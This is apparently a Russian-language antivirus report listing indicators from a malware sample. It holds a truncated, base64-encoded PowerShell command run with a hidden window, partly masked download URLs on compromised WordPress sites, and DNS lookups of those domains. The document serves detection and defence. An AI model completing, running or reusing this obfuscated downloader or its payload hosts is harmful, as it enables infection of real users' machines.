Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAUQBVAFUAcABkAGsAPQAnAEcAUQBJAFUASQBuAHYAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBgAFQAeQBQAHIATwBgAFQATwBgAGMATwBsACIAIAA9AC...
- http://vf##265.org/wp-includes/fjkpboVUN/
- http://www.vf##265.org/wp-includes/fjkpboVUN/
- http://fa###nime.com/wp-content/ADk6n8jm61/
- http://www.pr###ntwoo.com/18632/4Mv8Km8guspb0133/
- http://jo####done.co.uk/wp-includes/NILXqD/
- DNS ASK vf##265.org
- DNS ASK fa###nime.com
- DNS ASK pr###ntwoo.com
- DNS ASK aa####ssikka.com
- DNS ASK jo####done.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAUQBVAFUAcABkAGsAPQAnAEcAUQBJAFUASQBuAHYAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBgAFQAeQBQAHIATwBgAFQATwBgAGMATwBsACIAIAA9AC...' (со скрытым окном)